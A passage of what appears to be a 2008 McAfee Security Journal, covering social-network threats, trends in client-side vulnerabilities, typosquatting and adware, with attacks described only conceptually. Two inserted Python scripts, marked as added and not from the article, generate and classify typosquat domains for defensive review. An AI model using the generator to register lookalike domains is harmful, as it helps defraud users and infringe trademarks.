Early incarnations of next-generation sites, called Social Networking 3.0, may in fact be perceived as spooky in the level of accuracy of this "artificial intelligence." Profiling takes on a different meaning in this realm, where the site can actually bring together users of similar interests. In some respects, the compatibility profiling used by online dating services could be considered an early incarnation of creating social connections through online profiling, bringing compatible people together; but in Social Networking 3.0 this concept is significantly expanded without the need to complete a lengthy questionnaire. Each time you click a link, rate a blog, or chat on a specific subject, the site can gain intelligence about you to enhance your social network.

Who will benefit from this explosion of information correlation? Of course, the user base is a driving factor, but others seek to benefit from this arrangement. Advertisers are drooling at the notion of higher conversion rates when marketing happens at the users' level based on their specific interests. More users will actually pay attention to the ads and take an interest in their content.

Risks Increase

As user benefits increase, so will opportunities for attackers. Spammers and scammers will look to exploit this treasure trove of information and will more easily construct convincing social engineering attacks with all this data. Users will be taken off guard by the level of detail and personalization in attack messages. Social spam will also have the potential to seriously disrupt the ecosystem, poisoning the network with solicitations and false testimonials. Site administrators will have their work cut out for them to keep the content quality high, while blocking the bad guys and still allowing everyone else to use the site as it is intended.

Securing future social networks will depend more heavily on server-side defenses. Back-end systems will need to scan large amounts of incoming and outgoing data, searching for evidence of mischief or malicious code. Site and content reputation services may help balance usability and security. The trust relationship between sites and users is key to the success of tomorrow's networks. Violation of that trust could lead to the failure of an entire community.

The increased use of open and portable profiles, mash-ups (web applications that combine content from various sources into a single tool), and open APIs will dramatically facilitate cross-site usage, but will also increase the complexity of defending against threats targeting these vectors. Multitiered attacks are difficult to pinpoint today and will be even more so tomorrow. Attacks may originate from one site only to be propagated through another before appearing on an affected social network. Host-based defenses will need to negotiate the relationships sites have with one another to piece together valid and invalid site interactions and weed out the good from the bad.

Many users will find the privacy concerns in this article (information harvesting and correlation, and location tracking) to be too great to ignore. Indeed, many people will not opt into such services. However, when users see that they can benefit from providing a little bit of data and they have established trust relationships, many of them will volunteer some details. Vendors are acutely aware of this and are encouraging users to take baby steps, such as allowing locations to be reported only coarsely, by state or city, for example. Unfortunately, online predators will be lurking, and security vulnerabilities can have dire consequences when such information falls into the hands of the bad guys.

This is an exciting time for social networking sites, which are rapidly expanding, adding functionality, and growing their user bases. These sites have multibillion-dollar valuations. Big changes are ahead that are both compelling and threatening; in many ways the future of social networking sites defines the future of the Internet itself.

Threat Researcher Craig Schmugar has been researching and combating threats for McAfee Avert Labs since 2000. Since then he has discovered and classified thousands of new threats, including the Blaster, Mydoom, Mywife, and Sasser worms. He admits that during this time he is starting to feel more anti-social.

endnotes
1 http://cwe.mitre.org/documents/vuln-trends/index.html
2 http://www.facebook.com/press/info.php?statistics
3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebook-s-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google.com/search?num=100

The Changing Face of Vulnerabilities

By Rahul Kashyap

Although social engineering does not play a role in all forms of security threats, McAfee Avert Labs has recently observed a growing trend: malware writers using social engineering to exploit software vulnerabilities.

Most of the infamous Internet worms in the first half of this decade typically exploited one or more vulnerabilities in Microsoft applications. The notorious Sasser, Blaster, Code Red, and SQL Slammer had a common factor. (By the way, Avert Labs discovered Sasser and Blaster, as well as other significant malware.) They all exploited server vulnerabilities, and each was built to self-propagate as quickly as possible once the flaw had been exploited. Although products from many vendors have suffered from similar security holes, we will primarily focus on vulnerabilities and trends in Microsoft products in this article. We're not singling out Microsoft as being particularly vulnerable, but rather acknowledging that the popularity of Microsoft products among consumers and businesses attracts malware writers and data thieves like no other target.

Avert Labs has seen that server vulnerabilities that can be exploited by worms have diminished in the past few years thanks to increased use of security measures that protect remote procedure calls. To illustrate, Figure 1 lists all the remotely exploitable vulnerabilities via Microsoft Windows remote procedure calls during a 10-year period through the first quarter of 2008. The trend has fallen dramatically in the last two years. We see a similar trend if we sample remotely exploitable vulnerabilities for other popular Microsoft server platforms, such as IIS Web Server, SQL Server, and others.

Microsoft further increased its defenses with the release of Service Pack 2 for Windows XP. Along with other protection mechanisms, SP2 included data execution prevention,2 which, though not foolproof,3 definitely helped in curbing the network worm propagation that plagued Windows at that time. The effects of XP's SP2 became much more visible a couple of years later, as many users migrated to the updated operating system.

However, malware writers were not to be outdone. They quickly shifted their focus from servers to clients, uncovering vulnerabilities in Microsoft Office, Microsoft Internet Explorer, and various proprietary file formats. The client assault gave birth to a host of fuzzers4 (which search for security holes by throwing random or malformed data at an application), scripting-language parsing bugs, and ActiveX control–related vulnerabilities. Projects such as the "Month of Browser Bugs"5 (and others), axfuzz,6 COMRaider, and hamachi7 increased interest in this area and helped expose the innumerable issues plaguing client software. Bug discovery and the exploitation of client applications has been at its peak

[Figure 1: bar chart, "Microsoft remote vulnerability patches" per year, 1998 through 2008; y-axis 0 to 14]
Figure 1: Microsoft has significantly tightened the security of its remote procedure calls since 2006. (Source: Microsoft1)

[Figure 2: bar chart, "Office vulnerability patches" per year, 1998 through 2008; y-axis 0 to 45]
Figure 2: Microsoft Office vulnerabilities increased in 2006 and have remained high in the two successive years. (Source: Microsoft)

during this period; this trend continues even as we prepare this journal. The number of client installations being exploited is hard to determine, but some sources claim the figure to be in the hundreds of millions.8

Figure 2 offers a vivid picture of the sudden spike in vulnerabilities for Microsoft Office. These peaked in 2006 and continue to keep Microsoft busy.

The majority of these vulnerabilities have affected Office 2000. This version is widely used, thus it has been more widely exploited. In the economics of malware writers, vulnerabilities in Office 2000 offer a better return on investment. This is primarily because this suite has long had a major security disability: Office 2000 users must visit Microsoft's "Office Update" page to download patches,9 and the automatic online updates do not serve Office 2000 or Office 97. This oversight creates a terrific opportunity for malware writers to exploit the fact that many users are unlikely to regularly update their Office suites.10 The number of "zombie" machines taken over because of this type of security hole could be in the tens of thousands.

Although we're focusing on vulnerabilities in Microsoft products in this article, the trend affects other popular client software vendors, such as Adobe, Mozilla, Apple, and more. The "Month of Apple Bugs" highlighted many client problems, and there has been a big spike in the vulnerabilities found in widely used software, such as Apple QuickTime, Adobe Flash Player, and Adobe Reader, to name just a few. The recent exploitation of the PDF mailto: vulnerability (CVE-2007-5020)11 and of Flash using ActionScript (CVE-2007-0071) were among some of the critical flaws that affected thousands of users.

Targeted Attacks

The key to client vulnerabilities is that they need user interaction to be exploited. Hence malware authors have had to come up with more innovative ideas to lure users into clicking links and downloading images and documents from the Internet. One of the main thrusts for exploiting client systems has been a rapid growth in spam that relies on social engineering.

Social engineering and the focus on client vulnerabilities go hand in hand. The connection between these two factors is obvious, and the threat has recently become more complex.

Part of that complexity lies in targeted social engineering attacks, which are the emerging trend in the threat landscape. Targeted attacks are especially popular against defense and military establishments.12 Ever since the rash of Office vulnerabilities in 2006, multiple reports have appeared about government agencies receiving emails with malicious Word, PowerPoint, or Access files. It looks like the combination of social engineering and vulnerabilities has found another target: espionage.

Spying, of course, is stealthier and much more difficult to uncover than a merely profit-driven attack. On multiple occasions, the vulnerabilities discovered in these malicious embedded documents have been zero-day attacks, which make these document files even more difficult to detect: these vulnerabilities are often found only after the damage is done. Because these zero-day vulnerabilities have targeted specific government or military installations, it's possible that these attacks could be sponsored by foreign agents or governments. Custom-designed social engineering, zero-day vulnerabilities, money, and power sound like elements of a John le Carré novel. Some security analysts think this is not fiction. Many theorists have predicted that the next generation of warfare will be in cyberspace. Perhaps all of these events are just test cases for a cyberwar?

Stealthy Web Hacks

Other exploits that have changed in recent years are web server hacking and hijacking. Earlier, attackers used to deface web sites after they hacked them, usually leaving a note on the site in the hope of becoming famous. That's no longer the case, at least not with today's new generation of sophisticated hackers. With the plethora of client vulnerabilities, hackers have started exploiting these in a coordinated manner, spreading malware by first compromising popular web sites, stealthily planting malware, and luring users via social engineering tricks.

As a leading example, the Super Bowl (American football final) hack in February 2007 deserves mention, as it involved the insertion of a malicious JavaScript into the home page of the

official site.13 The script exploited two flaws in Internet Explorer and infected unpatched users with a Trojan that connected to a Chinese server, giving full access to the compromised machine. Similar stealthy hacks have been reported for many popular web sites, including embassies, newsgroups, and corporations.

Another emerging threat that made millions of homes vulnerable was the exploitation of home routers via Universal Plug and Play (UPnP), which allowed a malicious Flash file embedded in a web page to reconfigure the victim's router.14 UPnP accepts configuration requests from the local network without any authentication, so this attack does not need the router's administrative password. (Default passwords matter for the related attacks that drive the router's web administration interface from the victim's browser, and the fact that the vast majority of Internet users never change them makes those attacks possible too.) In this situation the victim could be lured by any seemingly innocuous link to pay bills online or read more about some topic. Most likely the user would have no clue that the router had been compromised, with all traffic, including sensitive passwords, being sent to someone else.

New Vectors of Exploitation

The early half of this decade saw extensive exploitation of stack, heap, and integer overflows, format-string vulnerabilities, and other weaknesses, most of which were relatively easy to exploit from a technical viewpoint. Now, however, most of these simple stack overflows are no longer a big threat in widely used software, such as Windows, because of better development practices, quality assurance testing, and compiler defenses such as /GS stack cookies. In addition, technologies like address space layout randomization have challenged hackers to go beyond traditional exploitation mechanisms.

Attacking vulnerabilities has entered a new phase, where exploiting concepts such as null pointers15 and race conditions16, as well as developing reliable exploitation techniques like heap spray17, are gaining popularity. Many of these bugs have been around for a long time and had been thought unexploitable.

This could be the perfect time for these techniques to leverage social engineering tricks as one of the attack vectors, for several reasons:

• Currently there aren't any publicly known reliable, automated ways to exploit these new techniques (mainly for mass propagation)
• They can be easily tested on targeted individuals or groups via social engineering as a part of the development process
• The return on investment for these techniques is higher using social engineering than in putting the effort into further research to achieve mass propagation

Conclusion

With the recent trends in vulnerabilities, social engineering is a force that is difficult to combat. No matter how many protection mechanisms vendors implement in their software and operating systems, effective social engineering can subvert them all as long as users continue to click on any link that they come across. We can't expect cyber laws to thwart social engineering any time soon (except for filing charges for fraud), but increased education can definitely help minimize losses and the impact on unsuspecting victims.

In the meantime, think twice when you're asked to click to "accept" that prize you've just won!

Rahul Kashyap is the Manager, Vulnerability Research and IPS Security for McAfee Avert Labs. He is responsible for vulnerability research, zero-day analysis, intrusion prevention system content, and emergency response. Kashyap is a big Dilbert fan and hopes to start his own geeky security-focused comic strip some day.

endnotes
1 http://www.microsoft.com/technet/security/current.aspx
2 "How to Configure Memory Protection in Windows XP SP2." http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx
3 "Analysis of GS protections in Microsoft Windows Vista." http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf
4 "Browser Fuzzing for fun and profit." http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-and-profit.html
5 "Month of Browser Bugs." http://blog.metasploit.com/2006/07/month-of-browser-bugs.html
6 "AXFUZZ: An ActiveX/COM enumerator and fuzzer." http://sourceforge.net/projects/axfuzz/
7 "Hamachi," by H D Moore and Aviv Raff. http://metasploit.com/users/hdm/tools/hamachi/hamachi.html
8 "637 million Users Vulnerable to Attack," Frequency X. http://blogs.iss.net/archive/TheWebBrowserThreat.html
9 "Keep your operating system updated: Frequently asked questions." http://www.microsoft.com/protect/computer/updates/faq.mspx
10 "MS Office Flaws Ideal Tools for Targeted Attacks." http://blog.washingtonpost.com/securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html
11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/
12 "The New E-spionage Threat." http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm
13 "Dolphins' Web sites hacked in advance of Super Bowl." http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html
14 "Hacking the interwebs," January 12, 2008. http://www.gnucitizen.org/blog/hacking-the-interwebs/
15 "Application-Specific Attacks: Leveraging the ActionScript Virtual Machine." http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf
16 "Unusual Bugs," Ilja van Sprundel. http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
17 "Heap Feng Shui in JavaScript." http://www.determina.com/security.research/presentations/bh-eu07/bh-eu07-sotirov-paper.html


Unintended Adventures In Browsing

By Benjamin Edelman

Browse the web, and you may be exposed to a variety of attacks that are well chronicled in the McAfee Security Journal.

From malicious banners to adware bundlers, the sites you intend to visit may cause remarkable harm. But users should also be aware of the sites they do not intend to visit, the sites they stumble across by accident.

Basic Strategy

For those of us who sometimes slip up when typing a URL, there's a special kind of security threat to watch out for. This plague of the imperfect typist is called typosquatting. The typosquatter's strategy is to anticipate domain names users might accidentally "request." Consider a user who misspells "bankofamerica.com" by doubling the "k" and dropping the "e" to yield "bankkofamrica.com." Ordinarily, that user would receive a browser error message and would then find the way to the real Bank of America site. But suppose a typosquatter had anticipated the user's error. The typosquatter might register the misspelled domain (and several other inaccurate names) in hopes that users will eventually wander in.

Historically, typosquatters primarily focused on spelling errors: inserting a stray letter, dropping a letter, or transposing two letters. But recently typosquatters have found other tricky ways to attract unintended traffic. Suppose a user omits the period that separates "www" from a site's domain name, for example, "wwwmcafee.com" instead of "www.mcafee.com." Typosquatters can register that domain. (As it turns out, someone did! And McAfee is working to recover it.) When the user instead drops the period before the top-level domain, typosquatters rightly anticipate that web browsers will automatically append ".com" to a name that has no top-level domain, so squatters also claim domains such as "www.mcafeecom.com." Still other squatters focus on adding "http" prefixes, or on registering the correspon
ding .com's for domains that actually reside in other top-level domains.

How do users end up at these typosquatting sites? Some users may forget a site's correct spelling. Others make typing errors. (Consider non-native English speakers, users with poor eyesight, and users still improving their typing skills.) Novice users may not realize the correct punctuation of a site's full address, and hurried users may wrongly enter part of a URL. Even the most sophisticated user can make an entry error on a mobile device with a small keyboard, on a handwriting-recognition tablet, or during a bumpy ride in a moving vehicle. So it would be wrong to blame the users who "request" typosquatting sites. On the contrary, although users certainly end up at these sites, they generally get there by mistake.

The Scope of Typosquatting

With many users making a wide variety of errors, typosquatting has become remarkably widespread. The McAfee SiteAdvisor® service runs ongoing searches for typosquatters, and in the McAfee Avert Labs' May 2008 examination, we found more than 80,000 domains typosquatting on just the top 2,000 web sites. Go deeper into the web, and typosquatting grows even more.
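The registration strategies described above (single-keystroke spelling errors, the dot after "www" omitted, the dot before the top-level domain omitted so that the browser appends ".com", "http" typed as part of the name, and the same name in another top-level domain) are mechanical enough to enumerate, which is how a brand owner or a service like SiteAdvisor can go looking for squatters rather than waiting for complaints. The script below is an added example written for this edit; it is not code from the article or from the SiteAdvisor service. It generates the candidate domains for a brand, and it goes one step beyond the article with a classifier that undoes the structural tricks and then uses edit distance to name the brand a suspicious domain most likely targets, so that two-error spellings such as "bankkofamrica.com" are caught as well. The brand list in the demo is constructed; the distance thresholds are an assumption chosen to limit false matches against unrelated short names.

```python
"""Typosquat candidate generator and classifier.

Added example for this edit; it is not code from the article, from McAfee, or
from the SiteAdvisor service. The brand list used in the demo is constructed.
"""
import string

LETTERS = string.ascii_lowercase


def split_domain(domain):
    """'www.bankofamerica.com' -> ('bankofamerica', 'com'); a leading 'www.' is dropped."""
    domain = domain.lower().strip(".")
    if domain.startswith("www."):
        domain = domain[4:]
    label, _, tld = domain.rpartition(".")
    return label, tld


def spelling_variants(label):
    """Every single-keystroke error: a dropped, doubled, inserted or transposed letter."""
    out = set()
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:])                            # drop a letter
        out.add(label[:i] + label[i] + label[i:])                     # double a letter
    for i in range(len(label) - 1):
        out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transpose two letters
    for i in range(len(label) + 1):
        for ch in LETTERS:
            out.add(label[:i] + ch + label[i:])                       # insert a stray letter
    out.discard(label)
    out.discard("")
    return out


def typosquat_candidates(domain, other_tlds=("com", "net", "org")):
    """Domains a squatter would register to catch mistyped requests for `domain`."""
    label, tld = split_domain(domain)
    out = {f"{v}.{tld}" for v in spelling_variants(label)}
    out.add(f"www{label}.{tld}")      # wwwmcafee.com: dot after www omitted
    out.add(f"{label}{tld}.com")      # mcafeecom.com: dot before the TLD omitted, browser adds .com
    out.add(f"http{label}.{tld}")     # "http" typed as part of the name
    out.add(f"httpwww{label}.{tld}")
    out.update(f"{label}.{t}" for t in other_tlds if t != tld)  # right name, wrong TLD
    out.discard(f"{label}.{tld}")
    return out


def edit_distance(a, b):
    """Levenshtein distance, computed with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate, brands):
    """Return the brand domain `candidate` most likely squats on, or None.

    The structural tricks are undone first (http/www prefixes, a TLD glued
    onto the label); the remaining label is then compared with each brand
    label by edit distance. Short brand labels tolerate one error and longer
    ones two (an assumed threshold), which keeps unrelated short names apart.
    """
    label, tld = split_domain(candidate)
    structural = False
    for prefix in ("httpwww", "http", "www"):
        if label.startswith(prefix) and len(label) > len(prefix):
            label, structural = label[len(prefix):], True
            break
    best, best_dist = None, None
    for brand in brands:
        blabel, btld = split_domain(brand)
        cand_label, glued = label, False
        if tld == "com" and label.endswith(btld) and label[:-len(btld)] == blabel:
            cand_label, glued = blabel, True          # e.g. mcafeecom.com
        dist = edit_distance(cand_label, blabel)
        if dist == 0 and tld == btld and not (structural or glued):
            continue                                  # the brand itself, not a squat
        limit = 1 if len(blabel) < 8 else 2
        if dist <= limit and (best_dist is None or dist < best_dist):
            best, best_dist = brand, dist
    return best


if __name__ == "__main__":
    # Constructed brand list for the demo; the real SiteAdvisor data set is not included.
    brands = ["mcafee.com", "bankofamerica.com", "cartoonnetwork.com"]
    print(len(typosquat_candidates("cartoonnetwork.com")), "candidates for cartoonnetwork.com")
    for seen in ["bankkofamrica.com", "wwwmcafee.com", "www.mcafeecom.com",
                 "ccartoonnetwork.com", "mcafee.com", "google.com"]:
        print(f"{seen:25} -> {classify(seen, brands)}")
```

Run against a registrar zone file or a DNS log, `typosquat_candidates` tells you which names to look up and `classify` tells you which brand each live one is riding on. The classifier is a heuristic: a legitimate name that happens to start with "www" or "http", or that sits within one edit of a short brand label, will be flagged, so in practice its output is a review queue rather than a verdict.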

Domains frequented by kids are particularly rich targets for typosquatters. For example, a recent analysis identified 327 different typosquatting registrations that are all close variants of "cartoonnetwork.com." Freecreditreport.com led the list compiled with SiteAdvisor technology; also popular were YouTube, Craigslist, Wikipedia, and Bank of America. (For the numbers, see Figure 1. And for examples of creative misspellings, see the Appendix.)

Legal Response

In general, typosquatting is illegal in the United States. The 1999 Anticybersquatting Consumer Protection Act (ACPA), 15 USC §1125(d), prohibits registering, trafficking in, or using domain names that are identical to, or confusingly similar to, a trademark or famous name. The ACPA grants damages of a typosquatter's ill-gotten profits (15 USC §1117(a)(1)), or statutory damages of $1,000 to $100,000 per typosquatting domain (as the court considers just) (§1117(d)).

Other countries' laws treat typosquatting somewhat differently, but most nations view typosquatting as a genre of trademark infringement; hence it is prohibited. Furthermore, the Uniform Domain-Name Dispute-Resolution Policy (UDRP) establishes arbitration for complaints about infringing domains. To register a site in a major top-level domain, a registrant must agree to the UDRP's jurisdiction, so the UDRP applies regardless of the location of the typosquatting site. That said, UDRP remedies are limited to the forfeiture of an infringing domain without a payment of money damages.

Although the ACPA imposes significant penalties, typosquatters seem to realize that enforcement is unlikely. So despite the threat of major sanctions, typosquatters continue to operate with abandon.

Typosquatters' Profit Strategy

Once a user arrives at a typosquatting site, the squatter wants to make as much money as possible.

Some years ago, notorious typosquatter John Zuccarini forced his unwitting visitors to view sexually explicit web sites they did not want and had not requested. Zuccarini registered at least 8,000 domains, which I documented at length.1 But he didn't get away with this scam forever: In September 2003, Zuccarini was arrested for violation of the Truth in Domain Names Act, which specifically prohibits any action that "uses a misleading domain name with the intent to deceive a person into viewing obscenity."

These days, the typosquatters' standard approach is advertising. Among the thousands of typosquatting domains I've examined in the past several years, it's rare to find one not showing ads.

DOMAIN                  NUMBER OF TYPOSQUATTING DOMAINS
freecreditreport.com    742
cartoonnetwork.com      327
youtube.com             320
craigslist.org          318
blogspot.com            276
clubpenguin.com         271
wikipedia.com           266
runescape.com           264
miniclip.com            263
bankofamerica.com       251
dailymotion.com         250
metroflog.com           249
addictinggames.com      248
friendster.com          246
myspace.com             239
verizonwireless.com     238
facebook.com            235

Figure 1: Typosquatting's most-popular list. This table reports a selection of trademarks highly targeted by typosquatters. The data comes from the May 2008 examination of the SiteAdvisor service data set.

Figure 2: A typosquatter registers a domain name similar to a leading bank's, and then, indirectly, sells advertising links to that and other banks.

When typosquatting sites show ads, they typically attempt to select ads "relevant" to the site the user was (in all likelihood) trying to reach. So in the bankkofamrica.com example we mentioned, the resulting ads promote, predictably, banks. Which banks? First on the list is Bank of America itself. (See Figure 2.)

Surprised? On the one hand, that ad placement is useful for Bank of America: At least they manage to reach the customer, despite the customer's typographic error. But on the other hand, it's remarkable for this typosquatter to ask Bank of America to pay to reach a customer who already requested Bank of America by name. After all, the typosquatter is infringing Bank of America's trademark, exactly in violation of the ACPA, which says that the typosquatter can't register such domains and that the typosquatter even has to pay Bank of America high statutory damages if the bank files a suit. But instead, the typosquatter ends up selling advertising space to Bank of America, which, at least initially, may be none the wiser.

How is this possible? Typosquatters don't directly sell space to advertisers. (Imagine the conversation: "We'd like to show your ads on our typosquatting site?" "You want to put our ads where?") Instead, typosquatters sell their inventory to ad networks, which in turn recruit advertisers. The largest network in this space is Google, whose AdSense for Domains product and other domain-syndication products serve ads on more than 80 percent of the typosquatting sites recently uncovered by SiteAdvisor technology.

36 McAFEE SECURITY JOURNAL

What’s Next for Typosquatters?

In June 2008, the Internet Corporation for Assigned Names and Numbers (ICANN) voted to speed the process of creating more top-level domains. Beyond the familiar domains most users know, there are already lesser-used domains such as .info, .biz, .museum, and .travel. Soon, we can expect new domains like .nyc or .lib (as some have suggested). More top-level domains mean more opportunities for cybersquatting—for exact registration of famous trademarks, or for close typographic variations of famous names. When users request these domains—whether in misguided attempts to reach the “real” sites, or in mistaken attempts to recall sites’ true addresses—typosquatters can jump in with their infringing interlopers.

But there are signs that typosquatting may soon be on the decline. For one, some major web sites have taken action to protect themselves and their customers from typosquatters. For example, in 2006, Neiman Marcus sued domain registrar Dotster. Neiman Marcus alleged that Dotster registered scores of domains infringing Neiman Marcus marks, showing ads to maximize its revenues from these typosquatting sites. Neiman Marcus claimed Dotster acted not just as registrar for these domains, but also as registrant, choosing which domains to register, and reaping the profits from resulting ads. The case settled in 2007 on confidential terms, and Neiman Marcus has since gone on to sue other large squatters. (Disclosure: I served as a consultant to Neiman Marcus in some of these cases.) Verizon and Microsoft have also been vigilant in similar litigation. On one hand, these cases aren’t particularly prevalent. But the ACPA’s statutory damages—$1,000 and more per domain—can force typosquatters to pay big money for their large-scale infringements. Microsoft alone has received more than $2 million in typosquatting settlements.

Further, persistent rumors suggest top ad networks, particularly Google, may abandon the typosquatting industry. Recent trademark-holder class-action litigation has challenged Google’s role in funding the typosquatting industry, and these typosquatting placements have been a repeated source of advertiser and trademark-holder complaints. If Google ceased funding typosquatting, typosquatters would have far less incentive to register infringing domains; no other ad network is likely to pay typosquatters as much as Google does. (Disclosure: I serve as co-counsel in Vulcan Golf, et al., v. Google, et al., trademark-holder class-action litigation regarding Google’s responsibility for the typosquatting sites where Google pays to place ads.)

Defenses

Though the typosquatting battles continue, concerned users can do plenty to protect themselves. First, be careful when you type. Be alert for typosquatting, particularly when requesting a site that’s hard to spell. Guessing a domain name may not be the best choice; consider using a search engine instead.

Second, after arriving at a site, look twice before you proceed. Is this really the site you intended to reach? Is this link an ordinary pointer, or a paid advertisement? Should this government site really be a .com, or did you want the corresponding .gov? A bit of critical thinking may serve you well as a defense against typosquatting or other attacks.

Appropriate software can also help protect users from typosquatters. SiteAdvisor technology identifies many typosquatting sites. A typo-protection service, such as OpenDNS, provides additional protection. Search engines typically offer help—“Did you mean? …” spelling correction—so that users can avoid many typosquatting sites by running searches instead of typing domain names directly into a browser’s address bar.

Benjamin Edelman is an assistant professor at the Harvard Business School, where he studies electronic marketplaces and online fraud. He is also a special advisor to McAfee for the SiteAdvisor service, offering an independent perspective to supplement SiteAdvisor site ratings. Though a fast and accurate typist, Professor Edelman has occasionally embarked on unintended browsing adventures.

APPENDIX 1

Examples of Typosquatting Sites: Cartoonnetwork.com

Among the more than 80,000 domains in SiteAdvisor’s May 2008 examinations we found these typosquatting variations of cartoonnetwork.com:

ccartoonnetwork.com ckartoonnetwork.com cairtoonnetwork.com dcartoonnetwork.com jcartoonnetwork.com cuartoonnetwork.com ncartoonnetwork.com vcartoonnetwork.com acartoonnetwork.com cfartoonnetwork.com caertoonnetwork.com bcartoonnetwork.com ceartoonnetwork.com caortoonnetwork.com canrtoonnetwork.com
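As an added illustration (not code from the article or from McAfee), here is a check a defender can run over domain names seen in DNS or proxy logs to flag names a single keystroke away from a brand domain; the sample list reuses five of the appendix’s variations plus a few constructed controls, and the function names are my own.

```python
"""Flag observed domain names that are one keystroke away from a brand domain.

Added example, not code from the article: a defender reviewing DNS or proxy
logs can use this to spot the kind of variations listed in the appendix.
Function names and the sample list are my own.
"""
from typing import Dict, List, Optional, Tuple

# Constructed sample: five of the appendix's cartoonnetwork.com variations
# plus a few controls that exercise the other edit types.
OBSERVED: List[str] = [
    "ccartoonnetwork.com", "ckartoonnetwork.com", "cairtoonnetwork.com",
    "dcartoonnetwork.com", "canrtoonnetwork.com",
    "cartoonnetwork.com",   # the genuine domain: not a variant
    "cartoonnetwrok.com",   # constructed: adjacent letters swapped
    "cartoonetwork.com",    # constructed: one letter dropped
    "cartoonnetwork.co",    # constructed: same name, wrong TLD
    "example.com",          # unrelated
]


def split_domain(domain: str) -> Tuple[str, str]:
    """Return (second-level label, TLD); good enough for two-label names."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def classify_edit(brand: str, cand: str) -> Optional[str]:
    """Name the single edit turning brand into cand, or None if it is not
    exactly one insertion, omission, substitution or transposition."""
    if brand == cand:
        return None
    lb, lc = len(brand), len(cand)
    if lc == lb + 1:
        # Skip the common prefix; the rest must match after dropping one char.
        i = 0
        while i < lb and brand[i] == cand[i]:
            i += 1
        return "insertion" if brand[i:] == cand[i + 1:] else None
    if lc == lb - 1:
        i = 0
        while i < lc and brand[i] == cand[i]:
            i += 1
        return "omission" if brand[i + 1:] == cand[i:] else None
    if lc == lb:
        diffs = [i for i in range(lb) if brand[i] != cand[i]]
        if len(diffs) == 1:
            return "substitution"
        if (len(diffs) == 2 and diffs[1] == diffs[0] + 1
                and brand[diffs[0]] == cand[diffs[1]]
                and brand[diffs[1]] == cand[diffs[0]]):
            return "transposition"
    return None


def find_typosquats(brand: str, observed: List[str]) -> Dict[str, str]:
    """Map each observed name that looks like a typo of brand to its edit type."""
    b_sld, b_tld = split_domain(brand)
    hits: Dict[str, str] = {}
    for name in observed:
        sld, tld = split_domain(name)
        if sld == b_sld:
            if tld != b_tld:
                hits[name] = "tld-swap"   # right name, wrong TLD (.co for .com)
            continue
        kind = classify_edit(b_sld, sld)
        if kind is not None:
            hits[name] = kind
    return hits


if __name__ == "__main__":
    for name, kind in find_typosquats("cartoonnetwork.com", OBSERVED).items():
        print(f"{name:24s} {kind}")
```

All fifteen appendix entries are single-letter insertions, so a distance-1 rule catches them; the same rule applied to a brand’s own DNS telemetry is a cheap early warning that someone has registered lookalikes.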

Whatever Happened To Adware And Spyware?

By Aditya Kapoor

Adware and spyware are two of the primary tools used for the online promotion of advertising and marketing.

These applications often benefit from social engineering methodologies and often piggyback on an otherwise useful freeware or shareware application that a user wants to download. These unwanted applications typically come with end-user license agreements (EULAs) that are supposed to define their behavior. However, these descriptions are normally not explicit or useful, causing confusion for users and opening the door to further social engineering traps.

In the first half of this decade, adware and spyware—often called potentially unwanted programs, or PUPs—grew exponentially. After 2005, however, we have seen a constant decline in their numbers. In this article we’ll highlight the key changes in online compensation models that are the driving factor of this decline. Adware and spyware have mostly split into distinct fields: the former with cleaner applications and a better user-consent model developed by key adware players and the latter sometimes malicious and frequently defined as Trojan malware. This comparatively clean divide has helped keep the numbers of adware and spyware applications low. So if these PUPs are no longer a threat, will they soon be gone for good? To answer that, we will discuss the changing threat landscape and the role social engineering plays.

Seeking Clarity

The terms adware and spyware are frequently used loosely and interchangeably and often create confusion. We’ll follow definitions supplied by the Anti-Spyware Coalition (ASC).1

• Adware A type of advertising display software that delivers advertising content potentially in a manner or context that may be unexpected and unwanted by users. The ASC’s Risk Model document details many of the behaviors that may be considered unexpected or unwanted. Many adware applications also perform tracking functions and, therefore, may also be categorized as tracking technologies. Some consumers may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program, or are frustrated by its effects on system performance. On the other hand, some users may wish to keep particular adware programs if their presence subsidizes the cost of a desired product or service or if they provide advertising that is useful or desired, such as ads that are competitive or complementary to what the user is looking at or searching for.

• Spyware In its narrow sense, spyware is a term for tracking software deployed without adequate notice, consent, or control for the user. In its broader sense, spyware is used as a synonym for what the ASC calls “Spyware (and Other Potentially Unwanted Technologies)”: technologies deployed without appropriate user consent and/or implemented in ways that impair user control over:
– Material changes that affect their user experience, privacy, or system security
– Use of their system resources, including what programs are installed on their computers
– Collection, use, and distribution of their personal or other sensitive information

Acknowledging that the common term spyware has now largely drifted from its exact meaning, the members of the ASC have decided to use “spyware” (in its narrow sense) for technical documents. Recognizing further that it is impossible to avoid the wider connotations arising from popular usage, the ASC also notes the existence of a general interpretation that includes all PUPs. In this article, the term spyware is never used in its broad sense, but always in the narrow sense, namely, as software that is related to marketing. We use the term monitoring software to define pure spy programs such as keyloggers.

A Fast Takeoff

Adware and spyware grabbed our attention in the year 2000 with the appearance of Adware-Aureate, which employed the user’s browsing history to display ads. This move led to the creation of one of the first anti-spyware applications, Gibson Research Corp.’s OptOut.2

Adware and spyware started growing prominently around late 2004 and peaked in 2005. (See Figures 1 and 2.) The primary motive was to generate revenue via millions of installations on users’ desktops (via the pay-per-installation model) as well as to display advertisements (via the pay-per-click model). The adware and spyware industry flourished in these years due to the large amount of revenue generated from ads. Every time a user clicked a certain ad, the ad provider received a commission.

